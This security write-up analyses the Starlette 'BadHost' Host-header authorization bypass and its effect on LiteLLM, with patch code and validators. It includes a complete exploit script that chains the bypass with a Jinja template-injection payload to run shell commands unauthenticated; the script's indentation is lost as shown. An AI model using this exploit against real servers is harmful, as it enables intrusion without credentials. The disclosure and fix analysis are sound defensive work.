CVE-2026-48710: Starlette BadHost

Background

In May of this year, OSTIF disclosed a Starlette vulnerability named "BadHost", tracked as CVE-2026-48710.

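What deserves attention is not just Starlette itself. Starlette is one of the foundations of the Python ASGI ecosystem, and many higher-level applications depend on it. A typical example is FastAPI, which relies on Starlette for request parsing, route dispatch, and its middleware mechanism. As a result, any framework or product that depends on an affected Starlette version may be exposed to an authorization bypass.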

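This propagation chain is especially visible in AI infrastructure. Over the past two years many LLM services have been built on Starlette, and popular projects such as LiteLLM, vLLM, and FastMCP are all affected by this vulnerability.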

How the Vulnerability Works

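The conditions that trigger BadHost break down into three parts:

  1. The underlying framework (Starlette) uses the Host header to rebuild the URL
  2. The rebuilt URL disagrees with the path in the ASGI scope
  3. Downstream code trusts request.url.path and uses it for authorization checks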

Once BaseHTTPMiddleware receives the request, it wraps it in a _CachedRequest and calls dispatch_func to continue processing.

/starlette/middleware/base.py
class BaseHTTPMiddleware:
    def __init__(self, app: ASGIApp, dispatch: DispatchFunction | None = None) -> None:
        self.app = app
        self.dispatch_func = self.dispatch if dispatch is None else dispatch

    async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None:
        if scope["type"] != "http":
            await self.app(scope, receive, send)
            return

        request = _CachedRequest(scope, receive)
        ...
        response = await self.dispatch_func(request, call_next)

The Request that the auth middleware later receives is this _CachedRequest, and request.url is a lazily loaded property:

/starlette/requests.py
@property
def url(self) -> URL:
    if not hasattr(self, "_url"):  # pragma: no branch
        self._url = URL(scope=self.scope)
    return self._url

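When URL is initialized from a scope, it takes the real path from the scope, parses the Host header out of the headers, and concatenates the two into the full URL.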

/starlette/datastructures.py
class URL:
    def __init__(
        self,
        url: str = "",
        scope: Scope | None = None,
        **components: Any,
    ) -> None:
        if scope is not None:
            assert not url, 'Cannot set both "url" and "scope".'
            assert not components, 'Cannot set both "scope" and "**components".'
            scheme = scope.get("scheme", "http")
            server = scope.get("server", None)
            path = scope["path"]
            query_string = scope.get("query_string", b"")

            host_header = None
            for key, value in scope["headers"]:
                if key == b"host":
                    host_header = value.decode("latin-1")
                    break

            if host_header is not None:
                url = f"{scheme}://{host_header}{path}"
            elif server is None:
                url = path
            else:
                host, port = server
                default_port = {"http": 80, "https": 443, "ws": 80, "wss": 443}[scheme]
                if port == default_port:
                    url = f"{scheme}://{host}{path}"
                else:
                    url = f"{scheme}://{host}:{port}{path}"

            if query_string:
                url += "?" + query_string.decode()
        elif components:
            assert not url, 'Cannot set both "url" and "**components".'
            url = URL("").replace(**components).components.geturl()

        self._url = url

The Host header is concatenated here without any check that it conforms to the RFC, and every subsequent request.url.* accessor depends on self.components.

/starlette/datastructures.py
@property
def scheme(self) -> str:
    return self.components.scheme

@property
def netloc(self) -> str:
    return self.components.netloc

@property
def path(self) -> str:
    return self.components.path

@property
def query(self) -> str:
    return self.components.query

self.components is the result of re-parsing that URL string with urlsplit.

/starlette/datastructures.py
@property
def components(self) -> SplitResult:
    if not hasattr(self, "_components"):
        self._components = urlsplit(self._url)
    return self._components

This means that if an attacker sets the Host header to x/?, the final self._url is assembled as:

<scheme>://x/?<path>
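
The effect of this round trip can be reproduced with the standard library alone. The following is a minimal sketch, not Starlette's code: rebuilt_path is a hypothetical helper that only mimics the string interpolation followed by urlsplit described above, and the example paths and hosts are made up for illustration.

```python
from urllib.parse import urlsplit


def rebuilt_path(scheme: str, host_header: str, scope_path: str) -> str:
    """Interpolate the Host header into a URL string, then re-parse it.

    Hypothetical helper: it imitates the concatenation + urlsplit steps
    discussed in the text and is not part of Starlette.
    """
    url = f"{scheme}://{host_header}{scope_path}"
    return urlsplit(url).path


if __name__ == "__main__":
    real_path = "/admin/users"  # what the ASGI server placed in scope["path"]
    for host in ("example.com", "x/?", "x/health?"):
        print(f"Host {host!r:>14} -> url.path {rebuilt_path('http', host, real_path)!r}")
```

With a well-formed Host the re-parsed path equals the real path. With x/? everything after the question mark is parsed as the query string, so the path collapses to /, and a Host such as x/health? would make the path read /health instead.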

Meanwhile, route dispatch does not use request.url.path. It uses the untainted scope["path"]:

/starlette/routing.py
def matches(self, scope: Scope) -> tuple[Match, Scope]:
    path_params: dict[str, Any]
    if scope["type"] == "http":
        route_path = get_route_path(scope)
        match = self.path_regex.match(route_path)
        if match:
            matched_params = match.groupdict()
            for key, value in matched_params.items():
                matched_params[key] = self.param_convertors[key].convert(value)
            path_params = dict(scope.get("path_params", {}))
            path_params.update(matched_params)
            child_scope = {"endpoint": self.endpoint, "path_params": path_params}
            if self.methods and scope["method"] not in self.methods:
                return Match.PARTIAL, child_scope
            else:
                return Match.FULL, child_scope
    return Match.NONE, {}


def get_route_path(scope: Scope) -> str:
    path: str = scope["path"]
    root_path = scope.get("root_path", "")
    if not root_path:
        return path

    if not path.startswith(root_path):
        return path

    if path == root_path:
        return ""

    if path[len(root_path)] == "/":
        return path[len(root_path) :]

    return path

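At this point the backend sees request.url.path as /, because urlsplit treats everything after the ? as the query string, while the scope still holds the real <path>. That is the discrepancy.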

An example of a vulnerable auth middleware:

auth_middleware.py
from starlette.middleware.base import BaseHTTPMiddleware
from starlette.responses import JSONResponse


class VulnerableAuthMiddleware(BaseHTTPMiddleware):
    async def dispatch(self, request, call_next):
        path = request.url.path  # with a BadHost request this is `/`
        if path.startswith("/admin"):  # never true, so the check is bypassed
            token = request.headers.get("authorization")
            if token != "Bearer secret-token":
                return JSONResponse(
                    {"detail": "Unauthorized"},
                    status_code=401,
                )
        # Falls straight through to the real business logic!
        return await call_next(request)
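
For contrast, here is a minimal sketch of the same check keyed on scope["path"], the value the router actually dispatches on. It is written as a plain ASGI middleware using only the standard library so it runs without Starlette installed. ScopePathAuthMiddleware, PROTECTED_PREFIX, and the demo helper are hypothetical names introduced for illustration, and the token is the same placeholder as in the example above; this is not an official patch or a recommended production design.

```python
import asyncio
import hmac
import json

PROTECTED_PREFIX = "/admin"  # hypothetical protected area
EXPECTED_TOKEN = b"Bearer secret-token"  # placeholder, as in the example above


class ScopePathAuthMiddleware:
    """Plain ASGI middleware that authorizes on scope["path"], not request.url.path."""

    def __init__(self, app):
        self.app = app

    async def __call__(self, scope, receive, send):
        if scope["type"] != "http":
            await self.app(scope, receive, send)
            return

        # scope["path"] comes from the request line, so the Host header cannot alter it.
        if scope["path"].startswith(PROTECTED_PREFIX):
            token = dict(scope["headers"]).get(b"authorization", b"")
            if not hmac.compare_digest(token, EXPECTED_TOKEN):
                body = json.dumps({"detail": "Unauthorized"}).encode()
                headers = [
                    (b"content-type", b"application/json"),
                    (b"content-length", str(len(body)).encode()),
                ]
                await send({"type": "http.response.start", "status": 401, "headers": headers})
                await send({"type": "http.response.body", "body": body})
                return

        await self.app(scope, receive, send)


async def demo(host: bytes, path: str) -> int:
    """Drive the middleware with a hand-built scope and return the response status."""
    statuses = []

    async def app(scope, receive, send):
        await send({"type": "http.response.start", "status": 200, "headers": []})
        await send({"type": "http.response.body", "body": b"ok"})

    async def receive():
        return {"type": "http.request", "body": b"", "more_body": False}

    async def send(message):
        if message["type"] == "http.response.start":
            statuses.append(message["status"])

    scope = {"type": "http", "method": "GET", "path": path, "headers": [(b"host", host)]}
    await ScopePathAuthMiddleware(app)(scope, receive, send)
    return statuses[0]
```

Calling asyncio.run(demo(b"x/?", "/admin/users")) exercises the malformed Host case: because the decision is made on the scope path, the request without a token is rejected regardless of what the Host header contains.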

A Real-World Case: LiteLLM

LiteLLM Proxy is a typical AI gateway. It uses FastAPI to expose OpenAI-style APIs, and at the request entry point it checks virtual keys, user roles, allowed routes, budgets, model permissions, and so on.

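In affected versions, LiteLLM's auth logic does not use the ASGI scope["path"] directly. Instead it wraps the lookup in a get_request_route() helper. Taking v1.83.14-stable as an example, the core logic of this function is: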

def get_request_route(request: Request) -> str:
    try:
        if hasattr(request, "base_url") and request.url.path.startswith(
            request.base_url.path
        ):
            return request.url.path[len(request.base_url.path) - 1 :]
        else:
            return request.url.path
    except Exception:
        return request.url.path

In other words, LiteLLM's central auth path depends on request.url.path, which directly affects its route-based authorization. In user_api_key_auth, LiteLLM first computes:

route: str = get_request_route(request=request)

It then uses this route to decide whether the request targets a public route:

if (
    route in LiteLLMRoutes.public_routes.value
    or route_in_additonal_public_routes(current_route=route)
):
    return UserAPIKeyAuth(user_role=LitellmUserRoles.INTERNAL_USER_VIEW_ONLY)

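/ happens to be in LiteLLM's public_routes, so the attack chain becomes:

  1. The attacker requests an admin endpoint such as /prompts/test
  2. A malformed Host header makes request.url.path parse as /
  3. LiteLLM's auth layer concludes that a public route was requested and hands the request to the downstream handler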
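
The route confusion in these steps can be traced offline. The sketch below copies the v1.83.14-stable helper logic quoted earlier and feeds it a fake request object. Everything else is an assumption made for illustration: fake_request approximates how url.path and base_url.path would look with no root_path and an http scheme, and PUBLIC_ROUTES is a one-element stand-in for LiteLLMRoutes.public_routes.value, of which the text only says that it contains /.

```python
from types import SimpleNamespace
from urllib.parse import urlsplit

# Hypothetical stand-in for LiteLLMRoutes.public_routes.value.
PUBLIC_ROUTES = {"/"}


def get_request_route_old(request) -> str:
    """Same logic as the affected helper quoted in the text."""
    try:
        if hasattr(request, "base_url") and request.url.path.startswith(
            request.base_url.path
        ):
            return request.url.path[len(request.base_url.path) - 1 :]
        return request.url.path
    except Exception:
        return request.url.path


def fake_request(host_header: str, scope_path: str) -> SimpleNamespace:
    """Minimal request-like object (assumption: http scheme, empty root_path)."""
    url_path = urlsplit(f"http://{host_header}{scope_path}").path
    base_path = urlsplit(f"http://{host_header}/").path
    return SimpleNamespace(
        url=SimpleNamespace(path=url_path),
        base_url=SimpleNamespace(path=base_path),
        scope={"path": scope_path},
    )


def is_treated_as_public(host_header: str, scope_path: str) -> bool:
    """True when the old helper resolves the request to a public route."""
    request = fake_request(host_header, scope_path)
    return get_request_route_old(request) in PUBLIC_ROUTES
```

Under these assumptions, is_treated_as_public("x/?", "/prompts/test") evaluates to True while the same path with a well-formed Host such as localhost:4000 evaluates to False, even though scope["path"] is /prompts/test in both cases.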

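Combining the BadHost authorization bypass with a previously disclosed sink in the admin backend yields unauthenticated remote code execution.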

exploit_badhost.py
import argparse
import json
import socket
import ssl
import sys
from base64 import b64decode
from typing import Optional, Tuple
from urllib.parse import urlparse
class Logger:
COLORS = {'DEBUG': '\033[36m', 'INFO': '\033[32m', 'ERROR': '\033[31m', 'FATAL': '\033[35m'}
def __init__(self, verbose=False):
self.verbose = verbose
def _log(self, level, msg):
print(f"{self.COLORS.get(level, '')}[{level.lower()}]\033[0m {msg}")
def debug(self, msg):
if self.verbose:
self._log('DEBUG', msg)
def info(self, msg):
self._log('INFO', msg)
def error(self, msg):
self._log('ERROR', msg)
def fatal(self, msg):
self._log('FATAL', msg)
sys.exit(1)
class LiteLLMBadHostExploit:
BADHOST = "x/?"
def __init__(self, target, command, proxy=None, verbose=False):
self.target = target.rstrip('/')
self.command = command
self.logger = Logger(verbose=verbose)
parsed = urlparse(self.target)
self.host = parsed.hostname
self.port = parsed.port or (443 if parsed.scheme == 'https' else 80)
self.use_tls = parsed.scheme == 'https'
self.proxy = urlparse(proxy) if proxy else None
def run(self):
self.logger.info(f"Target: {self.target}")
self.logger.info(f"Command: {self.command}")
result = self._execute_command(self.command)
if result is None:
self.logger.fatal("Command execution failed")
self.logger.info("Output:")
print('\t' + result.replace('\n', '\n\t'))
def _execute_command(self, command: str) -> Optional[str]:
payload = (
"---\nmodel: gpt-4o\n---\n\nUser: "
"{% for c in ().__class__.__bases__[0].__subclasses__() %}"
"{% if c.__name__ == \"catch_warnings\" %}"
"{% set result = c.__init__.__globals__[\"sys\"].modules[\"os\"]"
".popen(\"" + command + "| base64 -w0\").read() %}"
"{{ c.__init__.__globals__[\"__builtins__\"][\"exec\"]("
"\"raise Exception('\" + result + \"')\") }}"
"{% endif %}{% endfor %}"
)
json_body = '{"dotprompt_content": "' + _to_unicode(payload) + '"}'
self.logger.debug(f"Payload size: {len(json_body)} bytes")
status, body = self._raw_request('POST', '/prompts/test', json_body)
self.logger.debug(f"Response: {status}")
if not body:
return None
try:
detail = json.loads(body).get('detail', '')
if not detail:
self.logger.debug(f"Response body: {body[:200]}")
return None
return b64decode(detail.encode()).decode()
except Exception as e:
self.logger.debug(f"Decode error: {e}, raw: {body[:200]}")
return None
def _raw_request(self, method: str, path: str, body: str) -> Tuple[Optional[str], str]:
try:
sock = self._connect()
if self.use_tls:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sock = ctx.wrap_socket(sock, server_hostname=self.host)
raw = (
f"{method} {path} HTTP/1.1\r\n"
f"Host: {self.BADHOST}\r\n"
f"Content-Type: application/json\r\n"
f"Content-Length: {len(body.encode())}\r\n"
f"Connection: close\r\n"
f"\r\n"
f"{body}"
)
self.logger.debug(f">>> {method} {path}")
sock.sendall(raw.encode())
response = b''
while True:
try:
chunk = sock.recv(8192)
if not chunk:
break
response += chunk
except socket.timeout:
break
sock.close()
text = response.decode(errors='replace')
status_line = text.split('\r\n')[0] if text else None
body_start = text.find('\r\n\r\n')
resp_body = text[body_start + 4:] if body_start > 0 else ''
return status_line, resp_body
except (socket.error, OSError) as e:
self.logger.error(f"Connection failed: {e}")
return None, ''
def _connect(self) -> socket.socket:
if self.proxy and self.use_tls:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(15)
sock.connect((self.proxy.hostname, self.proxy.port or 8080))
connect = f"CONNECT {self.host}:{self.port} HTTP/1.1\r\nHost: {self.host}:{self.port}\r\n\r\n"
sock.sendall(connect.encode())
resp = sock.recv(4096).decode()
if '200' not in resp:
raise ConnectionError(f"Proxy CONNECT failed: {resp.strip()}")
return sock
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(15)
sock.connect((self.host, self.port))
return sock
def _to_unicode(s: str) -> str:
return ''.join(f'\\u{ord(c):04x}' for c in s)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='LiteLLM BadHost RCE (CVE-2026-48710 + SSTI)',
epilog='Example: python exploit_badhost.py -t http://target:4000 -c "id"'
)
parser.add_argument('-t', '--target', required=True)
parser.add_argument('-c', '--command', required=True)
parser.add_argument('--proxy', default=None)
parser.add_argument('-v', '--verbose', action='store_true')
args = parser.parse_args()
print("\033[31m[*] LiteLLM BadHost RCE \u2014 CVE-2026-48710 + SSTI\033[0m")
print("\033[31m[*] No credentials required\033[0m\n")
LiteLLMBadHostExploit(
target=args.target,
command=args.command,
proxy=args.proxy,
verbose=args.verbose,
).run()

In the new version, LiteLLM changed get_request_route() to read request.scope["path"] first and explicitly bumped its Starlette dependency version.

/litellm/proxy/auth/auth_utils.py
def get_request_route(request: Request) -> str:
    """
    Resolve the request route from the ASGI scope, with ``root_path`` stripped.

    Prefer this over ``request.url.path`` for any auth, ACL, routing, or
    audit-log decision: Starlette reconstructs ``url.path`` by interpolating
    the Host header into a URL string and re-parsing with ``urlsplit``, so a
    malformed Host (e.g. ``localhost/?x=1``) collapses ``url.path`` to ``"/"``
    while FastAPI continues to dispatch on ``scope["path"]``. ``scope["path"]``
    is uvicorn's parse of the HTTP request line and matches the actual
    handler, so it's the authoritative route.

    Also normalizes sub-path deployments by stripping ``scope["root_path"]``
    e.g. ``/genai/chat/completions`` -> ``/chat/completions``.
    """
    try:
        scope = request.scope
        if not isinstance(scope, dict):
            return str(request.url.path)
        raw_path: str = str(scope.get("path", request.url.path))
        root_path: str = str(
            scope.get("app_root_path", scope.get("root_path", ""))
        ).rstrip("/")
        if not isinstance(raw_path, str):
            return str(request.url.path)
        # Strip root_path only when it matches whole path segments, guarding
        # against sibling paths like "/apifoo" being truncated under
        # root_path="/api". Trailing slashes on root_path are stripped above,
        # so bare "/" or "/prefix/" still leave the leading "/" intact.
        if root_path and (
            raw_path == root_path or raw_path.startswith(root_path + "/")
        ):
            stripped = raw_path[len(root_path) :]
            return stripped or "/"
        return raw_path
    except Exception as e:
        verbose_proxy_logger.debug(
            f"error on get_request_route: {str(e)}, defaulting to request.url.path={request.url.path}"
        )
        return str(request.url.path)
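
As defense in depth next to reading the path from the scope, a deployment might also reject syntactically malformed Host headers before any URL is rebuilt from them. The following is a minimal sketch of such a check. is_plausible_host_header and its pattern are hypothetical and deliberately stricter than the RFC grammar (they accept only a plain hostname, IPv4 address, or bracketed IPv6 literal, with an optional numeric port); this is not how Starlette or LiteLLM fixed the issue. Starlette also ships TrustedHostMiddleware, which restricts Host to an allow-list and is a separate mechanism from this syntactic check.

```python
import re

# Hypothetical, intentionally strict pattern: hostname / IPv4 / [IPv6], optional :port.
# Characters such as "/", "?", "#", "@" and whitespace can never match.
_HOST_RE = re.compile(
    r"(?:\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9.-]+)(?::[0-9]{1,5})?"
)


def is_plausible_host_header(value: str) -> bool:
    """Return True only if the whole Host header value matches the strict pattern."""
    return _HOST_RE.fullmatch(value) is not None


if __name__ == "__main__":
    for candidate in ("example.com", "example.com:8080", "[::1]:8000", "x/?", ""):
        print(f"{candidate!r:>20} -> {is_plausible_host_header(candidate)}")
```

A gateway or outer middleware could answer 400 whenever this function returns False, which keeps values like x/? from ever reaching URL reconstruction. The pattern would need loosening for environments that legitimately use other Host forms.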

References